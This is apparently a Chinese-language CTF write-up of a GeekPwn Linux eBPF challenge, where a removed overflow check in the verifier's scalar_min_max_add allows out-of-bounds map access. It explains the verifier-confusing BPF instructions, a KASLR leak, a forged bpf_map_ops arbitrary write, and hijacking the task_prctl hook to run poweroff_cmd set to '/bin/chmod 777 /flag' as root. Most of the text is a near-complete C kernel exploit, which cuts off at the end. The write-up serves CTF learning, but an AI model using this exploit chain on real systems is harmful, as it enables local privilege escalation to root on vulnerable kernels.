上周参加了酷炫的GEEKPWN大会,比赛时未能解出这道题目,因为是bpf相关的洞,之前也有一点了解,赛后七哥不厌其烦地给我指导,最终成功解出,非常感谢sunichi
师傅的帮助。本文相关文件在这里
附件里贴心地给了source源码和linux-5.8.6的源码,我们拿beyond compare
比较一下两个项目文件夹,可以找到不同的文件,拿vscode比较一下具体地文件,即可看到diff
的结果.可以看到在verifier.c
文件中的scalar_min_max_add
函数中缺失了溢出检查。
具体看一下此处的代码和调用,只跟到check_alu_op
就差不多了,因为之前我们分析bpf漏洞的时候知道核心检查函数do_check
中会调用此函数。因此最后的漏洞调用链为:do_check
->check_alu_op
->adjust_reg_min_max_vals
->adjust_scalar_min_max_vals
->scalar_min_max_add
。
//verifier.c static int adjust_scalar_min_max_vals(struct bpf_verifier_env *env, struct bpf_insn *insn, struct bpf_reg_state *dst_reg, struct bpf_reg_state src_reg) { switch (opcode) { case BPF_ADD: ret = sanitize_val_alu(env, insn); if (ret < 0) { verbose(env, "R%d tried to add from different pointers or scalars\n", dst); return ret; } scalar32_min_max_add(dst_reg, &src_reg); scalar_min_max_add(dst_reg, &src_reg); dst_reg->var_off = tnum_add(dst_reg->var_off, src_reg.var_off); break; //... } } // static int adjust_reg_min_max_vals(struct bpf_verifier_env *env, struct bpf_insn *insn) { //... return adjust_scalar_min_max_vals(env, insn, dst_reg, *src_reg); } // /* check validity of 32-bit and 64-bit arithmetic operations */ static int check_alu_op(struct bpf_verifier_env *env, struct bpf_insn *insn) { //... else { /* all other ALU ops: and, sub, xor, add, ... */ if (BPF_SRC(insn->code) == BPF_X) { if (insn->imm != 0 || insn->off != 0) { verbose(env, "BPF_ALU uses reserved fields\n"); return -EINVAL; } /* check src1 operand */ err = check_reg_arg(env, insn->src_reg, SRC_OP); if (err) return err; } else { if (insn->src_reg != BPF_REG_0 || insn->off != 0) { verbose(env, "BPF_ALU uses reserved fields\n"); return -EINVAL; } } /* check src2 operand */ err = check_reg_arg(env, insn->dst_reg, SRC_OP); if (err) return err; if ((opcode == BPF_MOD || opcode == BPF_DIV) && BPF_SRC(insn->code) == BPF_K && insn->imm == 0) { verbose(env, "div by zero\n"); return -EINVAL; } if ((opcode == BPF_LSH || opcode == BPF_RSH || opcode == BPF_ARSH) && BPF_SRC(insn->code) == BPF_K) { int size = BPF_CLASS(insn->code) == BPF_ALU64 ? 64 : 32; if (insn->imm < 0 || insn->imm >= size) { verbose(env, "invalid shift %d\n", insn->imm); return -EINVAL; } } /* check dest operand */ err = check_reg_arg(env, insn->dst_reg, DST_OP_NO_MARK); if (err) return err; return adjust_reg_min_max_vals(env, insn); } }
static bool signed_add_overflows(s64 a, s64 b) { /* Do the add in u64, where overflow is well-defined */ s64 res = (s64)((u64)a + (u64)b); if (b < 0) return res > a; return res < a; }
看到这个洞很容易想到今年pwn2own上的一个ebpf洞,这个洞之前看到了没有分析,比赛的时候又去现学了一下CVE-2020-8835 pwn2own 2020 ebpf 提权漏洞分析和CVE-2020-8835 pwn2own 2020 ebpf 通过任意读写提权分析,简单说,漏洞在于计算tnum的时候使用的是smin_val和smax_val的低32bit,这导致0x100000001和0x1在函数看来是一样的,因此会被verifier认为是1,从而(n&2)>>1
被认为是0,而实际上我们传入n=2,即可得到1,再进行BPF_MUL
计算从而造成越界读写。
借鉴上述漏洞的想法,我们把verifier
作为一个vm的检查,要执行的数据先拿进去检查一遍,在检查过程中smin_val
和smax_val
会进行检查和更新,其范围表示verifier认为的某个寄存器输入的范围。假如我们可以通过一些手段欺骗其认为寄存器范围是一个常数C,后面再通过一些计算(移位,乘除)使寄存器范围变为常数0.而0乘除任何数字都是0,而实际可以传入非零值得到其他值,这就可以帮助我们进行map的越界读写。
那么这个洞要怎么达到上述效果呢?比赛的时候我一直在尝试用BPF_ALU64_IMM
来进行调整,使其smin_val==smax_val==0
,然而发现要使得a+x==b+x(mod 0x10000000000000000)
,除非a本身==b+0x10000000000000000。这条路并不可行,在参考文章里的核心越界指令是BPF_LDX_MEM(BPF_DW,0,7,0)
,其中r7被越界改为&map_addr-0x110,我们看下BPF_LDX_MEM
这个指令的检查条件,其核心检查函数为__check_mem_access
。可以看到off
需要大于等于0,因此我们必须trick使得smin_val==smax_val==0
。
//verifier.c /* check read/write into memory region (e.g., map value, ringbuf sample, etc) */ static int __check_mem_access(struct bpf_verifier_env *env, int regno, int off, int size, u32 mem_size, bool zero_size_allowed) { bool size_ok = size > 0 || (size == 0 && zero_size_allowed); struct bpf_reg_state *reg; if (off >= 0 && size_ok && (u64)off + size <= mem_size) return 0; reg = &cur_regs(env)[regno]; switch (reg->type) { case PTR_TO_MAP_VALUE: verbose(env, "invalid access to map value, value_size=%d off=%d size=%d\n", mem_size, off, size); break; case PTR_TO_PACKET: case PTR_TO_PACKET_META: case PTR_TO_PACKET_END: verbose(env, "invalid access to packet, off=%d size=%d, R%d(id=%d,off=%d,r=%d)\n", off, size, regno, reg->id, off, mem_size); break; case PTR_TO_MEM: default: verbose(env, "invalid access to memory, mem_size=%u off=%d size=%d\n", mem_size, off, size); } return -EACCES; }
赛后17师傅提示说可以使用BPF_ALU64_REG
来达到我们的目的,我们先来看下smin_val
和smax_val
的初始值S64_MIN
和S64_MAX
。其值分别为0x8000000000000000
和0x7fffffffffffffff
。我们来看下面的一组bpf指令。根据其初始值可以看到r8的smin和smax分别经历了0x8000000000000000->0x8000000000000001->0x4000000000000000->0x8000000000000000->0
以及0x7fffffffffffffff->0x8000000000000000->0x4000000000000000->0x8000000000000000->0
的变化,最终smin==smax==0,这是verifier做出的判断。然而如果我们输入r8==0x100000000
,满足开始的smin和smax条件,实际计算出来的结果确是0x100000000->0x100000001->0x80000000->0x100000000->0x200000000->2->0x110
。二者结果不一致,我们可以绕过检查进行越界读写。
BPF_ALU64_IMM(BPF_ADD,8,1), //r8 += 1
BPF_ALU64_IMM(BPF_RSH,8,1), //r8 >> 1
BPF_ALU64_IMM(BPF_LSH,8,1), //r8 << 1
BPF_ALU64_REG(BPF_ADD,8,8), //r8 += r8(overflow)
BPF_ALU64_IMM(BPF_RSH,8,32), //r8 >>= 32
BPF_ALU64_IMM(BPF_MUL,8,0x110/2), //r8 *= 0x110
任意读和参考文章的做法一致,我们看下核心的数据结构bpf_array
,其中的value字段对应我们输入map的地址,其-0x110的偏移处保存着array_map_ops
字段,它是一个全局的变量,存储在vmlinux内核文件的data段,通过它可以leak出kaslr的基址,通过wait_list->next
可以泄露出map的地址。在de4dcr0w
师傅的文章中,其构造了任意读来获取cred的地址,这里因为我没有起root shell所以就只泄露了这两个地址。
gef➤ p/a *(struct bpf_array*) 0xffff888005840000 $1 = { map = { ops = 0xffffffff82016880 <array_map_ops>, inner_map_meta = 0x0 <fixed_percpu_data>, security = 0xffff88800679df00, map_type = 0x2 <fixed_percpu_data+2>, key_size = 0x4 <fixed_percpu_data+4>, value_size = 0x2000 <irq_stack_backing_store>, max_entries = 0x1 <fixed_percpu_data+1>, map_flags = 0x0 <fixed_percpu_data>, spin_lock_off = 0xffffffffffffffea, id = 0x4 <fixed_percpu_data+4>, numa_node = 0xffffffffffffffff, btf_key_type_id = 0x0 <fixed_percpu_data>, btf_value_type_id = 0x0 <fixed_percpu_data>, btf = 0x0 <fixed_percpu_data>, memory = { pages = 0x3 <fixed_percpu_data+3>, user = 0xffff8880067de300 }, name = {0x0 <fixed_percpu_data> <repeats 16 times>}, btf_vmlinux_value_type_id = 0x0 <fixed_percpu_data>, bypass_spec_v1 = 0x0 <fixed_percpu_data>, frozen = 0x0 <fixed_percpu_data>, refcnt = { counter = 0x2 <fixed_percpu_data+2> }, usercnt = { counter = 0x1 <fixed_percpu_data+1> }, work = { data = { counter = 0x0 <fixed_percpu_data> }, entry = { next = 0x0 <fixed_percpu_data>, prev = 0x0 <fixed_percpu_data> }, func = 0x0 <fixed_percpu_data> }, freeze_mutex = { owner = { counter = 0x0 <fixed_percpu_data> }, wait_lock = { { rlock = { raw_lock = { { val = { counter = 0x0 <fixed_percpu_data> }, { locked = 0x0 <fixed_percpu_data>, pending = 0x0 <fixed_percpu_data> }, { locked_pending = 0x0 <fixed_percpu_data>, tail = 0x0 <fixed_percpu_data> } } } } } }, osq = { tail = { counter = 0x0 <fixed_percpu_data> } }, wait_list = { next = 0xffff8880058400c0, prev = 0xffff8880058400c0 } }, writecnt = 0x0 <fixed_percpu_data> }, elem_size = 0x2000 <irq_stack_backing_store>, index_mask = 0x0 <fixed_percpu_data>, aux = 0x0 <fixed_percpu_data>, { value = 0xffff888005840110,//这里是map_element的地址 ptrs = 0xffff888005840110, pptrs = 0xffff888005840110 } }
任意地址写的利用链依然是参照rtfingc
师傅的做法,首先看一下array_map_ops
成员,我们可以通过地址越界写覆写array_map_ops成员为map_element_addr
,从而伪造map_ops。
gef➤ p/a *(struct bpf_map_ops *) 0xffffffff82016880 $2 = { map_alloc_check = 0xffffffff81162ef0 <array_map_alloc_check>, map_alloc = 0xffffffff81163df0 <array_map_alloc>, map_release = 0x0 <fixed_percpu_data>, map_free = 0xffffffff811636c0 <array_map_free>, map_get_next_key = 0xffffffff81162fe0 <array_map_get_next_key>, map_release_uref = 0x0 <fixed_percpu_data>, map_lookup_elem_sys_only = 0x0 <fixed_percpu_data>, map_lookup_batch = 0xffffffff81149240 <generic_map_lookup_batch>, map_lookup_and_delete_batch = 0x0 <fixed_percpu_data>, map_update_batch = 0xffffffff81149020 <generic_map_update_batch>, map_delete_batch = 0x0 <fixed_percpu_data>, map_lookup_elem = 0xffffffff81163060 <array_map_lookup_elem>, map_update_elem = 0xffffffff811635b0 <array_map_update_elem>, map_delete_elem = 0xffffffff81163010 <array_map_delete_elem>, map_push_elem = 0x0 <fixed_percpu_data>, map_pop_elem = 0x0 <fixed_percpu_data>, map_peek_elem = 0x0 <fixed_percpu_data>, map_fd_get_ptr = 0x0 <fixed_percpu_data>, map_fd_put_ptr = 0x0 <fixed_percpu_data>, map_gen_lookup = 0xffffffff81163310 <array_map_gen_lookup>, map_fd_sys_lookup_elem = 0x0 <fixed_percpu_data>, map_seq_show_elem = 0xffffffff81163140 <array_map_seq_show_elem>, map_check_btf = 0xffffffff81163c60 <array_map_check_btf>, map_poke_track = 0x0 <fixed_percpu_data>, map_poke_untrack = 0x0 <fixed_percpu_data>, map_poke_run = 0x0 <fixed_percpu_data>, map_direct_value_addr = 0xffffffff81162f70 <array_map_direct_value_addr>, map_direct_value_meta = 0xffffffff81162fa0 <array_map_direct_value_meta>, map_mmap = 0xffffffff811630e0 <array_map_mmap>, map_poll = 0x0 <fixed_percpu_data> }
我们将map_push_elem
改为map_get_next_key
,在调用map_update_elem
的时候会调用map_push_elem
,但是需要map的类型为BPF_MAP_TYPE_QUEUE
或者BPF_MAP_TYPE_STACK
。
看一下调用链,map_update_elem函数中的bpf_map_update_value(map, f, key, value, attr->flags);
调用bpf_map_update_value函数的map->ops->map_push_elem(map, value, flags);
,最终调用了array_map_get_next_key(struct bpf_map *map, void *key, void *next_key)
。其中key
对应value
,next_key
对应attr->flags
。
最终当index < array->map.max_entries
时,有*next = index + 1;
,即*(attr->flags)=*(u32 *)value+1
。因为是无符号数比较,我们利用越界写提前布置array->map.max_entries=-1;map_type=BPF_MAP_TYPE_STACK
即可进行地址任意写。
static int map_update_elem(union bpf_attr *attr) { void __user *ukey = u64_to_user_ptr(attr->key); void __user *uvalue = u64_to_user_ptr(attr->value); int ufd = attr->map_fd; struct bpf_map *map; void *key, *value; u32 value_size; struct fd f; int err; if (CHECK_ATTR(BPF_MAP_UPDATE_ELEM)) return -EINVAL; f = fdget(ufd); map = __bpf_map_get(f); if (IS_ERR(map)) return PTR_ERR(map); if (!(map_get_sys_perms(map, f) & FMODE_CAN_WRITE)) { err = -EPERM; goto err_put; } if ((attr->flags & BPF_F_LOCK) && !map_value_has_spin_lock(map)) { err = -EINVAL; goto err_put; } key = __bpf_copy_key(ukey, map->key_size); if (IS_ERR(key)) { err = PTR_ERR(key); goto err_put; } if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH || map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH || map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY || map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE) value_size = round_up(map->value_size, 8) * num_possible_cpus(); else value_size = map->value_size; err = -ENOMEM; value = kmalloc(value_size, GFP_USER | __GFP_NOWARN); if (!value) goto free_key; err = -EFAULT; if (copy_from_user(value, uvalue, value_size) != 0) goto free_value; err = bpf_map_update_value(map, f, key, value, attr->flags);//这里 free_value: kfree(value); free_key: kfree(key); err_put: fdput(f); return err; } // static int bpf_map_update_value(struct bpf_map *map, struct fd f, void *key, void *value, __u64 flags) { int err; /* Need to create a kthread, thus must support schedule */ if (bpf_map_is_dev_bound(map)) { return bpf_map_offload_update_elem(map, key, value, flags); } else if (map->map_type == BPF_MAP_TYPE_CPUMAP || map->map_type == BPF_MAP_TYPE_SOCKHASH || map->map_type == BPF_MAP_TYPE_SOCKMAP || map->map_type == BPF_MAP_TYPE_STRUCT_OPS) { return map->ops->map_update_elem(map, key, value, flags); } else if (IS_FD_PROG_ARRAY(map)) { return bpf_fd_array_map_update_elem(map, f.file, key, value, flags); } bpf_disable_instrumentation(); if (map->map_type == BPF_MAP_TYPE_PERCPU_HASH || map->map_type == BPF_MAP_TYPE_LRU_PERCPU_HASH) { err = bpf_percpu_hash_update(map, key, value, flags); } else if (map->map_type == BPF_MAP_TYPE_PERCPU_ARRAY) { err = bpf_percpu_array_update(map, key, value, flags); } else if (map->map_type == BPF_MAP_TYPE_PERCPU_CGROUP_STORAGE) { err = bpf_percpu_cgroup_storage_update(map, key, value, flags); } else if (IS_FD_ARRAY(map)) { rcu_read_lock(); err = bpf_fd_array_map_update_elem(map, f.file, key, value, flags); rcu_read_unlock(); } else if (map->map_type == BPF_MAP_TYPE_HASH_OF_MAPS) { rcu_read_lock(); err = bpf_fd_htab_map_update_elem(map, f.file, key, value, flags); rcu_read_unlock(); } else if (map->map_type == BPF_MAP_TYPE_REUSEPORT_SOCKARRAY) { /* rcu_read_lock() is not needed */ err = bpf_fd_reuseport_array_update_elem(map, key, value, flags); } else if (map->map_type == BPF_MAP_TYPE_QUEUE || map->map_type == BPF_MAP_TYPE_STACK) { err = map->ops->map_push_elem(map, value, flags);//这里 } else { rcu_read_lock(); err = map->ops->map_update_elem(map, key, value, flags); rcu_read_unlock(); } bpf_enable_instrumentation(); maybe_wait_bpf_programs(map); return err; } /* Called from syscall */ static int array_map_get_next_key(struct bpf_map *map, void *key, void *next_key) { struct bpf_array *array = container_of(map, struct bpf_array, map); u32 index = key ? *(u32 *)key : U32_MAX; u32 *next = (u32 *)next_key; if (index >= array->map.max_entries) { *next = 0; return 0; } if (index == array->map.max_entries - 1) return -ENOENT; *next = index + 1; return 0; }
原本想劫持modprobe_path来进行任意命令执行,不过搜索之后未能发现,因此换成prctl函数劫持控制流的方式。我们在sys.c里可以看到prctl
系统调用的实现,内部调用了security_task_prctl
。在security.c中可以看到其函数实现,核心是调用hp->hook.task_prctl(option, arg2, arg3, arg4, arg5);
这个函数指针我们可以写个prctl调用的demo调试看到,其位置为0xffffffff824b3f88+0x18
。因为这里是可写的data段,我们可以讲其改成任意的函数指针并在调用prctl时触发控制流劫持。
data:FFFFFFFF824B3D80 capability_hooks security_hook_list <<0>, \
.data:FFFFFFFF824B3D80 offset security_hook_heads_0.capable-7D4679C0h, <\
.data:FFFFFFFF824B3D80 offset cap_capable-7EC76180h>, 0>
.data:FFFFFFFF824B3D80 security_hook_list <<0>, \
.data:FFFFFFFF824B3D80 offset security_hook_heads_0.settime-7D4679A0h, <\
.data:FFFFFFFF824B3D80 offset cap_settime-7EC763C0h>, 0>
.data:FFFFFFFF824B3D80 security_hook_list <<0>, \
.data:FFFFFFFF824B3D80 offset security_hook_heads_0.ptrace_access_check-7D4679E0h,\
.data:FFFFFFFF824B3D80 <offset cap_ptrace_access_check-7EC75AD0h>, 0>
.data:FFFFFFFF824B3D80 security_hook_list <<0>, \
.data:FFFFFFFF824B3D80 offset security_hook_heads_0.ptrace_traceme-7D4679D8h,\
.data:FFFFFFFF824B3D80 <offset cap_ptrace_traceme-7EC75B60h>, 0>
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3, unsigned long, arg4, unsigned long, arg5) { struct task_struct *me = current; unsigned char comm[sizeof(me->comm)]; long error; error = security_task_prctl(option, arg2, arg3, arg4, arg5); if (error != -ENOSYS) return error; error = 0; //... } // int security_task_prctl(int option, unsigned long arg2, unsigned long arg3, unsigned long arg4, unsigned long arg5) { int thisrc; int rc = LSM_RET_DEFAULT(task_prctl); struct security_hook_list *hp; hlist_for_each_entry(hp, &security_hook_heads.task_prctl, list) { thisrc = hp->hook.task_prctl(option, arg2, arg3, arg4, arg5); if (thisrc != LSM_RET_DEFAULT(task_prctl)) { rc = thisrc; if (thisrc != 0) break; } } return rc; }
函数的第一个option是一个32位的变量,因此我们在64位下不可控,我们选择劫持其为poweroff_work_func
函数地址,并将poweroff_cmd
改为要执行的命令。
这条攻击链如下,poweroff_work_func->run_cmd(poweroff_cmd)->call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC)->call_usermodehelper_exec(info, wait)
。最终可以以root权限启动一个用户态的程序。
我们这里选择将poweroff_cmd
覆写为/bin/chmod 777 /flag
,之后用户态下查看即可
static void poweroff_work_func(struct work_struct *work) { __orderly_poweroff(poweroff_force); } // static int __orderly_poweroff(bool force) { int ret; ret = run_cmd(poweroff_cmd);//这里 if (ret && force) { pr_warn("Failed to start orderly shutdown: forcing the issue\n"); /* * I guess this should try to kick off some daemon to sync and * poweroff asap. Or not even bother syncing if we're doing an * emergency shutdown? */ emergency_sync(); kernel_power_off(); } return ret; } // char poweroff_cmd[POWEROFF_CMD_PATH_LEN] = "/sbin/poweroff"; static const char reboot_cmd[] = "/sbin/reboot"; static int run_cmd(const char *cmd) { char **argv; static char *envp[] = { "HOME=/", "PATH=/sbin:/bin:/usr/sbin:/usr/bin", NULL }; int ret; argv = argv_split(GFP_KERNEL, cmd, NULL); if (argv) { ret = call_usermodehelper(argv[0], argv, envp, UMH_WAIT_EXEC);//这里 argv_free(argv); } else { ret = -ENOMEM; } return ret; } /** * call_usermodehelper() - prepare and start a usermode application * @path: path to usermode executable * @argv: arg vector for process * @envp: environment for process * @wait: wait for the application to finish and return status. * when UMH_NO_WAIT don't wait at all, but you get no useful error back * when the program couldn't be exec'ed. This makes it safe to call * from interrupt context. * * This function is the equivalent to use call_usermodehelper_setup() and * call_usermodehelper_exec(). */ int call_usermodehelper(const char *path, char **argv, char **envp, int wait) { struct subprocess_info *info; gfp_t gfp_mask = (wait == UMH_NO_WAIT) ? GFP_ATOMIC : GFP_KERNEL; info = call_usermodehelper_setup(path, argv, envp, gfp_mask, NULL, NULL, NULL); if (info == NULL) return -ENOMEM; return call_usermodehelper_exec(info, wait); }
题目给的vmlinux是无符号的,调试起来非常费劲,因此我拿源码自己编译了一个带符号的,这样可以源码调试,因为编译的问题有一些函数会内联进去,IDA中搜符号搜不到,调试的时候如果搜不到,可以找上层调用函数,再自己去定位。
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <stdint.h> #include <string.h> #include <sys/ioctl.h> #include <sys/syscall.h> #include <sys/socket.h> #include <errno.h> #include <sys/prctl.h> #include "linux/bpf.h" #include "bpf_insn.h" #define LOG_BUF_SIZE 65535 #define BPF_MAP_GET(idx, dst) \ BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \ BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \ BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \ BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \ BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \ BPF_EXIT_INSN(), /* exit(0); */ \ BPF_LDX_MEM(BPF_DW, (dst), BPF_REG_0, 0) /* r_dst = *(u64 *)(r0) */ #define BPF_MAP_GET_ADDR(idx, dst) \ BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = r9 */ \ BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), /* r2 = fp */ \ BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), /* r2 = fp - 4 */ \ BPF_ST_MEM(BPF_W, BPF_REG_10, -4, idx), /* *(u32 *)(fp - 4) = idx */ \ BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \ BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), /* if (r0 == 0) */ \ BPF_EXIT_INSN(), /* exit(0); */ \ BPF_MOV64_REG((dst), BPF_REG_0) /* r_dst = (r0) */ int ctrlmapfd, expmapfd; int progfd; int sockets[2]; char bpf_log_buf[LOG_BUF_SIZE]; void gen_fake_elf(){ system("echo -ne '#!/bin/sh\n/bin/chmod 777 /flag\n' > /tmp/chmod"); system("chmod +x /tmp/chmod"); system("echo -ne '\\xff\\xff\\xff\\xff' > /tmp/fake"); system("chmod +x /tmp/fake"); } void init(){ setbuf(stdin,0); setbuf(stdout,0); //gen_fake_elf(); } void x64dump(char *buf,uint32_t num){ uint64_t *buf64 = (uint64_t *)buf; printf("[-x64dump-] start : \n"); for(int i=0;i<num;i++){ if(i%2==0 && i!=0){ printf("\n"); } printf("0x%016lx ",*(buf64+i)); } printf("\n[-x64dump-] end ... \n"); } void loglx(char *tag,uint64_t num){ printf("[lx] "); printf(" %-20s ",tag); printf(": %-#16lx\n",num); } static int bpf_prog_load(enum bpf_prog_type prog_type, const struct bpf_insn *insns, int prog_len, const char *license, int kern_version); static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size, int max_entries); static int bpf_update_elem(int fd ,void *key, void *value,uint64_t flags); static int bpf_lookup_elem(int fd,void *key, void *value); static void writemsg(void); static void __exit(char *err); struct bpf_insn insns[]={ BPF_LD_MAP_FD(1,3), BPF_LD_MAP_FD(9,3), //r9 = ctrl_map_fd BPF_MAP_GET(0,8), //r9 = ctrl_map_fd[0], r0 = &ctrl_map BPF_MOV64_REG(6,0), //r6 = ctrl_map BPF_ALU64_IMM(BPF_ADD,8,1), //r8 += 1 BPF_ALU64_IMM(BPF_RSH,8,1), //r8 >> 1 BPF_ALU64_IMM(BPF_LSH,8,1), //r8 << 1 BPF_ALU64_REG(BPF_ADD,8,8), //r8 += r8 BPF_ALU64_IMM(BPF_RSH,8,32), //r8 >>= 32 BPF_ALU64_IMM(BPF_MUL,8,0x110/2), //r8 *= 0x110 BPF_LD_MAP_FD(9,4), //r9 = exp_map_fd BPF_MAP_GET_ADDR(0,7), //r7 = &exp_map BPF_ALU64_REG(BPF_SUB,7,8), //r7 -= r8 BPF_LDX_MEM(BPF_DW,0,7,0), //r0 = [r7+0] BPF_STX_MEM(BPF_DW,6,0,0x10), //r6+0x10 = r0 = ctrl_map[2] BPF_LDX_MEM(BPF_DW,0,7,0xc8), //r0 = [r7+0xc0] BPF_STX_MEM(BPF_DW,6,0,0x18), //r6+0x18 = r0 = ctrl_map[3] BPF_ALU64_IMM(BPF_ADD,0,0x50), //r0 += 0x50 => element_addr BPF_LDX_MEM(BPF_DW,8,6,8), //r8 = [r6+8] = ctrl_map[1] BPF_JMP_IMM(BPF_JNE,8,0x2,4), //arb write BPF_STX_MEM(BPF_DW,7,0,0), //[r7] = [ops] = r0 = element_addr BPF_ST_MEM(BPF_W,7,0x18,BPF_MAP_TYPE_STACK),//[ops+0x18] = BPF_MAP_TYPE_STACK BPF_ST_MEM(BPF_W,7,0x24,-1), //max_entries BPF_ST_MEM(BPF_W,7,0x2c,0), //locak_off //exit BPF_ALU64_IMM(BPF_MOV,0,0), // BPF_EXIT_INSN(), }; void prep(){ ctrlmapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,sizeof(int),0x100,0x1); if(ctrlmapfd<0){ __exit(strerror(errno));} expmapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY,sizeof(int),0x2000,0x1); if(expmapfd<0){ __exit(strerror(errno));} printf("ctrlmapfd: %d, expmapfd: %d \n",ctrlmapfd,expmapfd); progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER, insns, sizeof(insns), "GPL", 0); if(progfd < 0){ __exit(strerror(errno));} if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets)){ __exit(strerror(errno)); } if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0){ __exit(strerror(errno)); } } void pwn(){ printf("pwning...\n"); uint32_t key = 0x0; char *ctrlbuf = malloc(0x100); char *expbuf = malloc(0x3000); uint64_t *ctrlbuf64 = (uint64_t *)ctrlbuf; uint64_t *expbuf64 = (uint64_t *)expbuf; memset(ctrlbuf,'A',0x100); for(int i=0;i<0x2000/8;i++){ expbuf64[i] = i+1; } ctrlbuf64[0]=0x100000000; ctrlbuf64[1]=0x0; bpf_update_elem(ctrlmapfd,&key,ctrlbuf,0); bpf_update_elem(expmapfd,&key,expbuf,0); writemsg(); // leak memset(ctrlbuf,0,0x100); bpf_lookup_elem(ctrlmapfd,&key,ctrlbuf); x64dump(ctrlbuf,8); bpf_lookup_elem(expmapfd,&key,expbuf); x64dump(expbuf,8); uint64_t map_leak = ctrlbuf64[2]; uint64_t elem_leak = ctrlbuf64[3]-0xc0+0x110; //uint64_t kaslr = map_leak - 0xffffffff82016340; uint64_t kaslr = map_leak - 0xffffffff82016880; //uint64_t modprobe_path = 0xffffffff82446d80 + kaslr; loglx("map_leak",map_leak); loglx("elem_leak",elem_leak); loglx("kaslr",kaslr); //loglx("modprobe",modprobe_path); getchar(); uint64_t fake_map_ops[]={ kaslr + 0xffffffff81162ef0, kaslr + 0xffffffff81163df0, 0x0, kaslr + 0xffffffff811636c0, kaslr + 0xffffffff81162fe0, //get net key 5 0x0, 0x0, kaslr + 0xffffffff81149240, 0x0, kaslr + 0xffffffff81149020, 0x0, kaslr + 0xffffffff81163060, kaslr + 0xffffffff811635b0, kaslr + 0xffffffff81163010, kaslr + 0xffffffff81162fe0, //map_push_elem 15 0x0, 0x0, 0x0, 0x0, kaslr + 0xffffffff81163310, 0x0, kaslr + 0xffffffff81163140, kaslr + 0xffffffff81163c60, 0x0, 0x0, 0x0, kaslr + 0xffffffff81162f70, kaslr + 0xffffffff81162fa0, kaslr + 0xffffffff811630e0, }; // overwrite bpf_map_ops memcpy(expbuf,(void *)fake_map_ops,sizeof(fake_map_ops)); bpf_update_elem(expmapfd,&key,expbuf,0); //overwrite fake ops ctrlbuf64[0]=0x100000000; ctrlbuf64[1]=0x2; bpf_update_elem(ctrlmapfd,&key,ctrlbuf,0); bpf_update_elem(expmapfd,&key,expbuf,0); x64dump(ctrlbuf,8); x64dump(expbuf,8); writemsg(); //overwrite the hp->hook.task_prctl uint64_t poweroff_work_func = 0xFFFFFFFF8108B240 + kaslr; uint64_t poweroff_cmd = 0xFFFFFFFF82448260 + kaslr; uint64_t hp_hook = 0xffffffff824b3fa0 + kaslr; expbuf64[0] = (poweroff_work_func & 0xffffffff) - 1; bpf_update_elem(expmapfd,&key,expbuf,hp_hook); expbuf64[0] = (poweroff_work_func >> 32) - 1; bpf_update_elem(expmapfd,&key,expbuf,hp_hook+4); //overwite poweroff_cmd to "/bin/chmod 777 /flag" expbuf64[0] = 0x6e69622f - 1; bpf_update_elem(expmapfd,&key,expbuf,poweroff_cmd); expbuf64[0] = 0x6d68632f - 1; bpf_update_elem(expmapfd,&key,expbuf,poweroff_cmd+4); expbuf64[0] = 0x3720646f - 1; bpf_update_elem(expmapfd,&key,expbuf,poweroff_cmd+8); expbuf64[0] = 0x2f203737 - 1; bpf_update_elem(expmapfd,&key,expbuf,poweroff_cmd+0xc); expbuf64[0] = 0x67616c66 - 1; bpf_update_elem(expmapfd,&key,expbuf,poweroff_cmd+0x10); //trigger prctl(0,0); return; } int main(int argc,char **argv){ init(); prep(); pwn(); return 0; } static void __exit(char *err) { fprintf(stderr, "error: %s\n", err); exit(-1); } static void writemsg(void) { char buffer[64]; ssize_t n = write(sockets[0], buffer, sizeof(buffer)); if (n < 0) { perror("write"); return; } if (n != sizeof(buffer)) fprintf(stderr, "short write: %lu\n", n); } static int bpf_prog_load(enum bpf_prog_type prog_type, const struct bpf_insn *insns, int prog_len, const char *license, int kern_version){ union bpf_attr attr = { .prog_type = prog_type, .insns = (uint64_t)insns, .insn_cnt = prog_len / sizeof(struct bpf_insn), .license = (uint64_t)license, .log_buf = (uint64_t)bpf_log_buf, .log_size = LOG_BUF_SIZE, .log_level = 1, }; attr.kern_version = kern_version; bpf_log_buf[0] = 0; return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr)); } static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size, int max_entries){ union bpf_attr attr = { .map_type = map_type, .key_size = key_size, .value_size = value_size, .max_entries = max_entries }; return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr)); } static int bpf_update_elem(int fd ,void *key, void *value,uint64_t flags){ union bpf_attr attr = { .map_fd = fd, .key = (uint64_t)key, .value = (uint64_t)value, .flags = flags, }; return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr)); } static int bpf_lookup_elem(int fd,void *key, void *value){ union bpf_attr attr = { .map_fd = fd, .key = (uint64_t)key, .value = (uint64_t)value, }; return 